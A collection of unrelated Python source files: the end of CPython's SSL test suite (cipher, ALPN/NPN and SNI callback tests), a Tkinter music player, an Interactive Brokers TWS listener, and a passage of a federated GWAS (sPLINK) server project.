context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
main.py
|
from tkinter import *
import os
import time
import threading
from mutagen.mp3 import MP3
from tkinter import filedialog
import tkinter.messagebox
from tkinter import ttk # to improve the styles of buttons and widgets
from ttkthemes import themed_tk as tk
from pygame import mixer
def show_Details(play_it):
Main_text['text'] = 'Playing.....' + ' ' + os.path.basename(play_it)
Main_text['anchor'] = 'e'
file_ext = os.path.splitext(play_it)
if file_ext[1] == '.mp3': # To handle mp3 files using mutagen
audio_lenth = MP3(play_it)
total_lenth = audio_lenth.info.length
else: # to handle .wav,.ogg music file extensions
a = mixer.Sound(play_it)
total_lenth = a.get_length()
m, s = divmod(total_lenth, 60)
m = round(m)
s = round(s)
time_format = '{:02d}:{:02d}'.format(m, s)
Main_lenth['text'] = 'Duration : '+' '+time_format
thread1 = threading.Thread(target=rem_count, args=(total_lenth,))
thread1.start()
def rem_count(total_lenth):
global paused
curr_secs = 0
while curr_secs <= total_lenth and mixer.music.get_busy():
if paused:
continue
else:
m, s = divmod(curr_secs, 60)
m = round(m)
s = round(s)
m1, s1 = divmod(total_lenth, 60)
m1 = round(m1)
s1 = round(s1)
time_format = '{:02d}:{:02d}'.format(m, s)
time_format1 = '{:02d}:{:02d}'.format(m1, s1)
current_lenth['text'] = 'Cuurent Duration : ' + ' ' + time_format
time.sleep(1)
curr_secs += 1
total_lenth -= 1
def Play_music():
global paused
if paused:
mixer.music.unpause()
# global paused = FALSE
status_bar['text'] = 'Playing Music.....' + \
' ' + os.path.basename(music_file)
status_bar['anchor'] = 'w'
paused = FALSE
else:
try:
Stop_music()
time.sleep(1)
song = play_list.curselection()
song = int(song[0])
play_it = music_list[song]
mixer.music.load(play_it)
mixer.music.play()
status_bar['text'] = 'Playing Music.....' + \
' ' + os.path.basename(play_it)
status_bar['anchor'] = 'w'
show_Details(play_it)
except:
tkinter.messagebox.showerror("Error", "File Not Selected")
def Stop_music():
mixer.music.stop()
status_bar['text'] = 'Music Stopped'
status_bar['anchor'] = 'e'
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
status_bar['text'] = 'Music Paused...'
status_bar['anchor'] = 'e'
def rewind_music():
Play_music()
status_bar['text'] = 'Music Rewinded...'+' '+os.path.basename(music_file)
status_bar['anchor'] = 'e'
def close_window_fully():
Stop_music()
exit()
def set_vol(val):
vol = float(val)/100
mixer.music.set_volume(vol)
def about_us():
tkinter.messagebox.showinfo(
'About Rockerz', 'This Is A Music Player Devloped With Python Tkinter And Pygame By Robin Singh')
def browse_files():
global music_file
music_file = filedialog.askopenfilename()
add_to_listbox(music_file)
music_list = []
def add_to_listbox(music_file):
file_name = os.path.basename(music_file)
index = 0
play_list.insert(index, file_name)
music_list.insert(index, music_file)
play_list.pack()
index += 1
def delete_btn():
song = play_list.curselection()
song = int(song[0])
play_list.delete(song)
music_list.pop(song)
def mute_music():
global muted
if muted:
mixer.music.set_volume(.7)
vol_button1.configure(image=pic5)
scale1.set(70)
muted = FALSE
else:
mixer.music.set_volume(0)
vol_button1.configure(image=pic4)
scale1.set(0)
muted = TRUE
def close_window_fully1():
Stop_music()
exit()
muted = FALSE
main_window = tk.ThemedTk()
main_window.get_themes()
# themes : 'arc','radiance','breeze','ubuntu' etc
main_window.set_theme("breeze")
# creating toolbar
tool_bar = Menu(main_window)
main_window.config(menu=tool_bar)
status_bar = ttk.Label(main_window, text="Welcome To Rockerzz",
relief=SUNKEN, anchor=W, font='verdana 10 italic')
status_bar.pack(side=BOTTOM, fill=X)
# creating sub menus
sub_menu = Menu(tool_bar, tearoff=0) # to remove dashed line from menu
tool_bar.add_cascade(label='File', menu=sub_menu)
sub_menu.add_command(label="Open", command=browse_files)
sub_menu.add_command(label="Exit", command=close_window_fully1)
sub_menu = Menu(tool_bar, tearoff=0) # to remove dashed line from menu
tool_bar.add_cascade(label='Help', menu=sub_menu)
sub_menu.add_command(label="About Us ", command=about_us)
mixer.init()
# main_window.geometry("600x300")
main_window.title("Rockerz")
main_window.iconbitmap("./Music-Player-App/assests/rockerz.ico")
left_frame = Frame(main_window)
left_frame.pack(side=RIGHT, padx=30, pady=20)
play_list = Listbox(left_frame)
play_list.pack()
add_btn = ttk.Button(left_frame, text='ADD', command=browse_files)
add_btn.pack(side=LEFT, padx=3)
del_btn = ttk.Button(left_frame, text='DELETE', command=delete_btn)
del_btn.pack(side=LEFT)
right_frame = Frame(main_window)
right_frame.pack(pady=20)
r_top_frame = Frame(right_frame)
r_top_frame.pack()
Main_text = ttk.Label(
r_top_frame, text="Devloped By Robin Singh", font='arial 10 italic')
Main_text.pack()
Main_lenth = ttk.Label(r_top_frame, text="Length : --:--", relief=GROOVE)
Main_lenth.pack(pady=5)
current_lenth = ttk.Label(
r_top_frame, text="Current Duration : --:--", relief=GROOVE)
current_lenth.pack()
playlist_box = Listbox(main_window)
canvas = Frame(right_frame)
canvas.pack(pady=5)
pic = PhotoImage(file="./Music-Player-App/assests/images/play.png")
play_button1 = ttk.Button(canvas, image=pic, command=Play_music)
play_button1.grid(row=0, column=0, padx=5)
pic1 = PhotoImage(file="./Music-Player-App/assests/images/stop.png")
stop_button1 = ttk.Button(canvas, image=pic1, command=Stop_music)
stop_button1.grid(row=0, column=1, padx=5)
pic2 = PhotoImage(file="./Music-Player-App/assests/images/pause.png")
pause_button1 = ttk.Button(canvas, image=pic2, command=pause_music)
pause_button1.grid(row=0, column=2, padx=5)
bottom_canvas = Frame(right_frame)
bottom_canvas.pack(padx=30, pady=30)
pic3 = PhotoImage(file="./Music-Player-App/assests/images/rewind.png")
rewind_button1 = ttk.Button(bottom_canvas, image=pic3, command=rewind_music)
rewind_button1.grid(row=0, column=0, pady=10)
pic4 = PhotoImage(file="./Music-Player-App/assests/images/002-mute.png")
pic5 = PhotoImage(file="./Music-Player-App/assests/images/001-volume.png")
vol_button1 = ttk.Button(bottom_canvas, image=pic5, command=mute_music)
vol_button1.grid(row=0, column=1)
scale1 = ttk.Scale(bottom_canvas, from_=0, to=100,
orient=HORIZONTAL, command=set_vol)
scale1.set(50)
mixer.music.set_volume(.5)
scale1.grid(row=0, column=3, padx=5, pady=10)
# For overriding close button
main_window.protocol("WM_DELETE_WINDOW", close_window_fully)
main_window.mainloop()
|
ib_api.py
|
import logging
from ktrade.config import is_configured, configuration_for
from time import sleep
from ktrade.queues import inbound_queue, outbound_queue
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from threading import Thread
class IBApi(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
def ib_loop(api):
api.run()
def start_listening(app):
""" The main entry point to the background thread which is responsible
for sending and receiving messages to and from TWS
"""
ib = IBApi()
log = logging.getLogger(__name__)
connected = False
with app.app_context():
log.debug("Started IB background thread")
while not connected:
# sleep(5)
if (is_configured()):
# # App is configured, lets get connecting!
log.debug("App configured. Connecting to TWS")
host = configuration_for("tws_host").value
port = configuration_for("tws_port").value
ib.connect(host, int(port), 1)
api_thread = Thread(target=ib_loop, daemon=True, args=[ib])
api_thread.start()
connected = True
else:
# Not configured. We'll wait a bit then try again
log.debug("App not configured. Will retry in 5 seconds")
sleep(5)
# Now we're connected, we wait for message from the client
log.info("TWS connected. Awaiting messages...")
while True:
message = inbound_queue.get(block=True)
log.info(f'Received message: {message.message_type}')
|
splink_server_project.py
|
"""
server-side sPLINK project to aggregate the local parameters from the clients
Copyright 2021 Reza NasiriGerdeh and Reihaneh TorkzadehMahani. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_server.project.hyfed_server_project import HyFedServerProject
from hyfed_server.util.hyfed_steps import HyFedProjectStep
from hyfed_server.util.status import ProjectStatus
from hyfed_server.util.utils import client_parameters_to_list
from hyfed_server.util.data_type import DataType
from splink_server.util.splink_steps import SplinkProjectStep
from splink_server.util.splink_parameters import SplinkGlobalParameter, SplinkLocalParameter, SplinkProjectParameter
from splink_server.util.splink_algorithms import SplinkAlgorithm
from splink_server.util.utils import round_result
import io
import numpy as np
from scipy import stats
from matplotlib import pyplot as plt
import pandas as pd
import multiprocessing
import threading
import logging
logger = logging.getLogger(__name__)
class SplinkServerProject(HyFedServerProject):
""" Server side of sPLINK tool """
def __init__(self, creation_request, project_model):
""" Initialize sPLINK project attributes based on the values set by the coordinator """
# initialize base project
super().__init__(creation_request, project_model)
try:
# retrieve the project model instance just created in the parent class
splink_model_instance = project_model.objects.get(id=self.project_id)
# chunk_size
chunk_size = int(creation_request.data[SplinkProjectParameter.CHUNK_SIZE])
splink_model_instance.chunk_size = chunk_size
self.chunk_size = chunk_size * 1000
# covariates
covariates = creation_request.data[SplinkProjectParameter.COVARIATES]
splink_model_instance.covariates = covariates
self.covariates = tuple(
[covariate_name.strip() for covariate_name in covariates.split(',')]) if covariates else ()
# max_iterations
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
max_iterations = int(creation_request.data[SplinkProjectParameter.MAX_ITERATIONS])
splink_model_instance.max_iterations = max_iterations
self.max_iterations = max_iterations
# result directory
result_dir = "splink_server/result"
splink_model_instance.result_dir = result_dir
self.result_dir = result_dir
# save the model
splink_model_instance.save()
logger.debug(f"Project {self.project_id} : sPLINK specific attributes initialized")
# #### chunking attributes
# re-initialized in the init_chunks function
self.total_chunks = -1
self.start_indices_chunks = list()
self.end_indices_chunks = list()
# re-initialized in the next_chunk functions
self.current_chunk = 0
self.chunk_start_index = -1
self.chunk_end_index = -1
self.considered_snp_indices = set() # SNP indices that are NOT ignored due to exceptions
self.in_process_snp_indices = set() # SNP indices whose beta values not converged yet (logistic regression)
self.considered_in_process_snp_indices = set() # it is always self.considered_snp_indices.intersection(self.in_process_snp_indices)
# ##### global parameters/values
self.sample_count = 0
self.snp_id_values = np.array([]) # SNP IDs common among all clients
# attributes related to all algorithms
self.allele_names = dict() # allele names used as the minor/major allele name across all clients' datasets
self.non_missing_sample_counts = dict() # sample count per SNP, where none of phenotype, sex, covariate, and SNP values are missing
self.allele_counts = dict() # first/second allele count for each SNP
self.minor_allele_names = dict()
self.major_allele_names = dict()
self.minor_allele_counts = dict()
self.major_allele_counts = dict()
self.minor_allele_frequencies = dict()
self.major_allele_frequencies = dict()
self.p_values = dict()
# chi-square algorithm attributes
self.contingency_tables = dict()
self.chi_square_values = dict()
self.odd_ratio_values = dict()
self.maf_case = dict() # minor allele frequency for case
self.maf_control = dict() # # minor allele frequency for control
# linear regression attributes
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
self.xt_x_inverse_matrices = dict()
self.sse_values = dict()
# logistic regression attributes
self.current_beta_iteration = 1
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict() # re-initialized in minor_allele_step
self.new_log_likelihood_values = dict()
self.new_beta_values = dict() # used in multi-processing
self.delta_log_likelihood_threshold = 0.0001
# linear/logistic regression attributes
self.beta_values = dict() # re-initialized in minor_allele_step
self.std_error_values = dict()
self.t_stat_values = dict()
# chromosome_number, base_pair_distance, and p-value for ALL chunks
# used for manhattan plot
self.chromosome_number_all_chunks = []
self.base_pair_distance_all_chunks = []
self.p_value_all_chunks = []
except Exception as model_exp:
logger.error(model_exp)
self.project_failed()
# ############### Project step functions ####################
def init_step(self):
""" Just tell clients to go to the next step """
try:
# tell clients to go to the SNP-ID step
self.set_step(SplinkProjectStep.SNP_ID)
except Exception as init_exception:
logger.error(f'Project {self.project_id}: {init_exception}')
self.project_failed()
def snp_id_step(self):
""" Compute the intersection of the SNP IDs from the clients """
try:
# compute the SNP IDs common among all clients
snp_ids_clients = client_parameters_to_list(self.local_parameters, SplinkLocalParameter.SNP_ID)
intersect_snp_ids = set(snp_ids_clients[0])
for client_snp_ids in snp_ids_clients:
intersect_snp_ids = intersect_snp_ids.intersection(client_snp_ids)
self.snp_id_values = np.array(list(intersect_snp_ids), dtype="S")
if len(self.snp_id_values) == 0:
logger.error("There is no SNP common among all clients!")
self.project_failed()
return
# initialize chunks
self.init_chunks()
# share common SNP IDs with the clients
self.global_parameters[SplinkGlobalParameter.SNP_ID] = self.snp_id_values
# tell clients to go to allele_name step
self.set_step(SplinkProjectStep.ALLELE_NAME)
except Exception as snp_id_exception:
logger.error(f'Project {self.project_id}: {snp_id_exception}')
self.project_failed()
def allele_name_step(self):
""" Ensure the clients employ the same allele name encoding in their datasets """
try:
allele_names_clients = client_parameters_to_list(self.local_parameters, SplinkLocalParameter.ALLELE_NAME)
# initialize allele names for each SNP
for snp_index in np.arange(len(self.snp_id_values)):
snp_alleles = list()
for client_allele_names in allele_names_clients:
snp_alleles.append(client_allele_names[0][snp_index]) # first allele name
snp_alleles.append(client_allele_names[1][snp_index]) # second allele name
# allele names must be sorted to make sure the corresponding counts from clients are consistent
self.allele_names[snp_index] = np.sort(np.unique(snp_alleles))
# Ensure there are exactly two allele names for the SNP across all clients' datasets
if len(self.allele_names[snp_index]) != 2:
logger.error(f"Project {self.project_id}: clients are using different allele names in their datasets!")
self.project_failed()
return
# tell clients to go to sample_count step
self.set_step(SplinkProjectStep.SAMPLE_COUNT)
except Exception as allele_name_exception:
logger.error(f'Project {self.project_id}: {allele_name_exception}')
self.project_failed()
def sample_count_step(self):
""" Compute global sample count and init chunks """
try:
# compute global sample count
self.sample_count = self.compute_aggregated_parameter(SplinkLocalParameter.SAMPLE_COUNT,
DataType.NON_NEGATIVE_INTEGER)
# start chunking process
self.setup_next_chunk()
except Exception as sample_count_exception:
logger.error(f'Project {self.project_id}: {sample_count_exception}')
self.project_failed()
def non_missing_count(self):
""" Compute global non-missing sample count as well as allele counts and determine global minor allele """
try:
# compute global non-missing sample counts for the SNPs
non_missing_sample_counts = self.compute_aggregated_parameter(SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT,
DataType.NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# compute global allele counts
allele_counts = self.compute_aggregated_parameter(SplinkLocalParameter.ALLELE_COUNT,
DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# determine global minor/major allele for each SNP
minor_allele_names = np.argmin(allele_counts, axis=1)
major_allele_names = 1 - minor_allele_names
# get the minor/major allele count for each SNP
minor_allele_counts = np.min(allele_counts, axis=1)
major_allele_counts = np.max(allele_counts, axis=1)
# compute minor/major allele frequency for each SNP
allele_counts_total = np.sum(allele_counts, axis=1)
minor_allele_frequencies = minor_allele_counts / allele_counts_total
major_allele_frequencies = major_allele_counts / allele_counts_total
# store global non-missing sample count, minor/major allele names/counts/frequencies in the dictionaries;
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices.copy()):
snp_counter += 1
self.non_missing_sample_counts[snp_index] = non_missing_sample_counts[snp_counter]
self.allele_counts[snp_index] = allele_counts[snp_counter]
self.minor_allele_names[snp_index] = self.allele_names[snp_index][minor_allele_names[snp_counter]]
self.major_allele_names[snp_index] = self.allele_names[snp_index][major_allele_names[snp_counter]]
self.minor_allele_counts[snp_index] = minor_allele_counts[snp_counter]
self.major_allele_counts[snp_index] = major_allele_counts[snp_counter]
self.minor_allele_frequencies[snp_index] = minor_allele_frequencies[snp_counter]
self.major_allele_frequencies[snp_index] = major_allele_frequencies[snp_counter]
# share the global minor/major allele names
minor_allele_names_considered = dict()
major_allele_names_considered = dict()
for snp_index in self.considered_snp_indices:
minor_allele_names_considered[snp_index] = self.minor_allele_names[snp_index]
major_allele_names_considered[snp_index] = self.major_allele_names[snp_index]
self.global_parameters[SplinkGlobalParameter.MINOR_ALLELE_NAME] = minor_allele_names_considered
self.global_parameters[SplinkGlobalParameter.MAJOR_ALLELE_NAME] = major_allele_names_considered
# tell clients to go to minor-allele step
self.set_step(SplinkProjectStep.MINOR_ALLELE)
except Exception as non_missing_count_exception:
logger.error(f'Project {self.project_id}: {non_missing_count_exception}')
self.project_failed()
def minor_allele_step(self):
""" Determine the next step based on the algorithm name """
try:
if self.algorithm == SplinkAlgorithm.CHI_SQUARE:
# shared SNP indices (excluding ignored ones) for which contingency table should be computed in clients
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to go to contingency-table step
self.set_step(SplinkProjectStep.CONTINGENCY_TABLE)
elif self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
# shared SNP indices (excluding ignored ones) for which XTX and XTY should be computed in clients
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to go to Beta-Linear step
self.set_step(SplinkProjectStep.BETA_LINEAR)
elif self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
# initialize log_likelihood and beta values
self.considered_in_process_snp_indices = self.considered_snp_indices.intersection(self.in_process_snp_indices)
